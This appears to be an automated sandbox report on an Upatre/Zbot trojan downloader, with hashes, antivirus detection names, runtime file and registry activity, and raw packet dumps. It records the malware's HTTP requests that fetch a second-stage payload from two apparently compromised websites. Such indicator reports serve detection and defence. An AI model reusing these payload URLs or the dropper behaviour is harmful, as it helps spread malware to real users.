Analysis Date2014-07-29 21:42:56
MD5b984b5cf9c48244f5233eb01d7ee0b5d
SHA189e8901d6586b5c0848749f380e16be302ce1941

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 9852e04deb66dac0e4f76e488e785f82 sha1: 476911dd079cfdb70b5f22238f0bce0c42f32154 size: 3584
Section.rdata md5: e71325114c389c1e3938be588ceb3945 sha1: e718a567455265820bd24f201291f867c90f3304 size: 1024
Section.data md5: 11398cb3a3813276464ee7f3ebd76ed6 sha1: d7ef037ab9fa8ebf37c8486c77c179f831512c46 size: 1536
Section.rsrc md5: 7f446a959c3172d859200716a1cca74f sha1: 031776346ffc65bbd27ca073618292c04fd6e413 size: 10752
Timestamp2013-04-07 22:10:41
PEhash9c163515c83777f0d8b89d34ea810d7ea80f9f4f
IMPhash5bdbfadc30986867f14f8da3f77b42ab
AV360 SafeTrojan.Downloader.JQKN
AVAd-AwareTrojan.Downloader.JQKN
AVAlwil (avast)Zbot-TCT [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Downloader.XIVZ-2942
AVAvira (antivir)TR/Yarwi.B.185.2
AVCA (E-Trust Ino)Win32/Upatre.KUFMcJD
AVCAT (quickheal)TrojanDownloader.Upatre.A4
AVClamAVWin.Trojan.Downloader-61193
AVDr. WebTrojan.DownLoad3.28161
AVEmsisoftno_virus
AVEset (nod32)Win32/TrojanDownloader.Waski.A
AVFortinetW32/Bublik.BZH!tr
AVFrisk (f-prot)W32/Downldr2.IZNH (exact)
AVF-SecureTrojan.Downloader.JQKN
AVGrisoft (avg)Generic_s.CQT
AVIkarusTrojan.Agent
AVK7Trojan-Downloader ( 0048f6391 )
AVKasperskyTrojan-Spy.Win32.Zbot.rmwh
AVMalwareBytesTrojan.Downloader.Upatre
AVMcafeeDownloader-FSH!B984B5CF9C48
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Upatre.AA
AVMicroWorld (escan)Trojan.Downloader.JQKN
AVNormanwinpe/Upatre.BL
AVSophosTroj/DwnLdr-LJA
AVSymantecDownloader.Upatre
AVTrend MicroTROJ_UPATRE.KYIY
AVVirusBlokAda (vba32)TrojanSpy.Zbot

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\updatepdf.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\updatepdf.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\updatepdf.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSannamumfordphoto.com
Winsock DNSgothambeerfest.co.uk

Network Details:

DNSgothambeerfest.co.uk
Type: A
87.117.220.217
DNSannamumfordphoto.com
Type: A
82.98.86.175
HTTP GEThttp://gothambeerfest.co.uk/wp-content/themes/iscout4wordpress/images/al1402.pdd
User-Agent: Updates downloader
HTTP GEThttp://annamumfordphoto.com/images/al1402.pdd
User-Agent: Updates downloader
HTTP GEThttp://gothambeerfest.co.uk/wp-content/themes/iscout4wordpress/images/al1402.pdd
User-Agent: Updates downloader
HTTP GEThttp://annamumfordphoto.com/images/al1402.pdd
User-Agent: Updates downloader
Flows TCP192.168.1.1:1031 ➝ 87.117.220.217:80
Flows TCP192.168.1.1:1032 ➝ 82.98.86.175:80
Flows TCP192.168.1.1:1033 ➝ 87.117.220.217:80
Flows TCP192.168.1.1:1034 ➝ 82.98.86.175:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 616c3134   GET /images/al14
0x00000010 (00016)   30322e70 64642048 5454502f 312e310d   02.pdd HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 20746578 742f2a2c   .Accept: text/*,
0x00000030 (00048)   20617070 6c696361 74696f6e 2f2a0d0a    application/*..
0x00000040 (00064)   55736572 2d416765 6e743a20 55706461   User-Agent: Upda
0x00000050 (00080)   74657320 646f776e 6c6f6164 65720d0a   tes downloader..
0x00000060 (00096)   486f7374 3a20616e 6e616d75 6d666f72   Host: annamumfor
0x00000070 (00112)   6470686f 746f2e63 6f6d0d0a 43616368   dphoto.com..Cach
0x00000080 (00128)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x00000090 (00144)   6368650d 0a0d0a                       che....

0x00000000 (00000)   47455420 2f696d61 6765732f 616c3134   GET /images/al14
0x00000010 (00016)   30322e70 64642048 5454502f 312e310d   02.pdd HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 20746578 742f2a2c   .Accept: text/*,
0x00000030 (00048)   20617070 6c696361 74696f6e 2f2a0d0a    application/*..
0x00000040 (00064)   55736572 2d416765 6e743a20 55706461   User-Agent: Upda
0x00000050 (00080)   74657320 646f776e 6c6f6164 65720d0a   tes downloader..
0x00000060 (00096)   486f7374 3a20616e 6e616d75 6d666f72   Host: annamumfor
0x00000070 (00112)   6470686f 746f2e63 6f6d0d0a 43616368   dphoto.com..Cach
0x00000080 (00128)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x00000090 (00144)   6368650d 0a0d0a                       che....

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f69 73636f75 7434776f   themes/iscout4wo
0x00000020 (00032)   72647072 6573732f 696d6167 65732f61   rdpress/images/a
0x00000030 (00048)   6c313430 322e7064 64204854 54502f31   l1402.pdd HTTP/1
0x00000040 (00064)   2e310d0a 41636365 70743a20 74657874   .1..Accept: text
0x00000050 (00080)   2f2a2c20 6170706c 69636174 696f6e2f   /*, application/
0x00000060 (00096)   2a0d0a55 7365722d 4167656e 743a2055   *..User-Agent: U
0x00000070 (00112)   70646174 65732064 6f776e6c 6f616465   pdates downloade
0x00000080 (00128)   720d0a48 6f73743a 20676f74 68616d62   r..Host: gothamb
0x00000090 (00144)   65657266 6573742e 636f2e75 6b0d0a43   eerfest.co.uk..C
0x000000a0 (00160)   61636865 2d436f6e 74726f6c 3a206e6f   ache-Control: no
0x000000b0 (00176)   2d636163 68650d0a 0d0a                -cache....

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f69 73636f75 7434776f   themes/iscout4wo
0x00000020 (00032)   72647072 6573732f 696d6167 65732f61   rdpress/images/a
0x00000030 (00048)   6c313430 322e7064 64204854 54502f31   l1402.pdd HTTP/1
0x00000040 (00064)   2e310d0a 41636365 70743a20 74657874   .1..Accept: text
0x00000050 (00080)   2f2a2c20 6170706c 69636174 696f6e2f   /*, application/
0x00000060 (00096)   2a0d0a55 7365722d 4167656e 743a2055   *..User-Agent: U
0x00000070 (00112)   70646174 65732064 6f776e6c 6f616465   pdates downloade
0x00000080 (00128)   720d0a48 6f73743a 20676f74 68616d62   r..Host: gothamb
0x00000090 (00144)   65657266 6573742e 636f2e75 6b0d0a43   eerfest.co.uk..C
0x000000a0 (00160)   61636865 2d436f6e 74726f6c 3a206e6f   ache-Control: no
0x000000b0 (00176)   2d636163 68650d0a 0d0a                -cache....


Strings
About
C:\03oVKH24.exe
C:\09qYxrkj.exe
C:\0caffa52d6aa2cfecea066a01a8db1024f0600a2f5cd5b629e6ef0715902528a
C:\16Vy_LkV.exe
C:\1YwkCOxj.exe
C:\260f2a767017346c760c7e1c5d764d38caac7c504c9f90e41a4c5f37092d6f14
C:\268fbe1a473535a333ec90598a763c698f4ff500b047cdc1f0fb00212a93d2d0
C:\2LmvD5_y.exe
C:\2mSPw0b_.exe
C:\46bfhm_i.exe
C:\50bf300d85128e844ed6079cfac4741a1405934d652b2e89d993bc91289dba83
C:\58GTSg8K.exe
C:\7yOlJrTY.exe
C:\9es0rfuy.exe
C:\AFvydeYk.exe
C:\ARfWh6iA.exe
C:\Ax9mqsXZ.exe
C:\bB4xPZ_B.exe
C:\bd63e9edce6e1699db7da8e8de7c9b70139c2e5c5a9c0d275bb437646a35d038
C:\c47ef3e5bc26c122bdb577341daba9b8c000da8c6072284f4542ef83e1637bcf
C:\cKHmRoM3.exe
C:\CL0rVP7N.exe
C:\d6a449eb917904d2053851c182403741680721f7de98d8a76f8f5636c144abe4
C:\DFfCfbrJ.exe
C:\dZnrsBPt.exe
C:\e2fa6cb2dc8bee415e6a556cfea00c031f7083544802cad4859602301f16e17b
C:\EaSwm9QG.exe
C:\EgOOzoyl.exe
C:\F4lW5JAf.exe
C:\f932655f416056ec95939e67ab4bae05c9eb4890be47e960feb11aa239e58a96
C:\FOiafA4e.exe
C:\g6m1rfwW.exe
C:\ghgFXxZ7.exe
C:\hCMePxyd.exe
C:\hpNbPqGM.exe
C:\INlBGoSi.exe
C:\iWkTpqY8.exe
C:\jD40CmGy.exe
C:\JXwQxaV0.exe
C:\_kPwWnzR.exe
C:\L5gSR3B5.exe
C:\lAMlpuCm.exe
C:\_LC5rWon.exe
C:\m4u5RBMh.exe
C:\NZPfov1x.exe
C:\Q9DqLFnu.exe
C:\QCZYCEsx.exe
C:\raS1Z4nI.exe
C:\RNlmMnjI.exe
C:\RW9xQ4AT.exe
C:\s6ds_ApR.exe
C:\T9LNVDmr.exe
C:\tLBXYSwO.exe
C:\tRYXOgIG.exe
C:\Users\lbohac\Desktop\fax.pdf.exe
C:\utBlmTmp.exe
C:\UZcNkPye.exe
C:\VvWkUe7L.exe
C:\vwrx6ihH.exe
C:\w7ug1hxU.exe
C:\WCF_vre3.exe
C:\wos0ib3I.exe
C:\x5iQjI7x.exe
C:\ZvKYH9KG.exe
Exit
FILE
Help
MS Sans Serif
Push to exit
Save
Wolmo
+/<	)>
\0`YZ#/
,1)0'A@C
1 '33='
;2=D*<!E!)
342=";89
>3*)(A6E
@6$8*2
7?.-</04
7:*62C
 ;A#-0
A0tm7R
AWVAf9
B4`_D :
C?	@!4
C8>1?)+.%
C>F&`[E*9
ClientToScreen
CloseHandle
COMCTL32.dll
CreateFileW
D2:79x
 D:8D,
@.data
DDDDDDD
DDFfdDD
DD=MG~
DialogBoxIndirectParamW
DragFinish
DragQueryFileA
DragQueryPoint
]=E:[ 
EndDialog
ExitProcess
F&DDD%d
F"RRR%d
FVfffRd
GDI32.dll
GetDlgItem
GetFileSize
I J5g_D'/
InitCommonControlsEx
J0QUY=
KERNEL32.dll
Krf*f_E=
KXG[O_
LineTo
MessageBoxA
MessageBoxW
mnq6::@
MoveToEx
&<$P @
prf*f_E=
prl6w[C6>
`.rdata
'rZ4v[C6
SendMessageW
SHELL32.dll
S"]+q_D x
TextOutA
!This program cannot be run in DOS mode.
Ur[!jN
USER32.dll
WINTRUST.dll
WinVerifyTrust
wsprintfW
X/#}N_2
z:3Sxr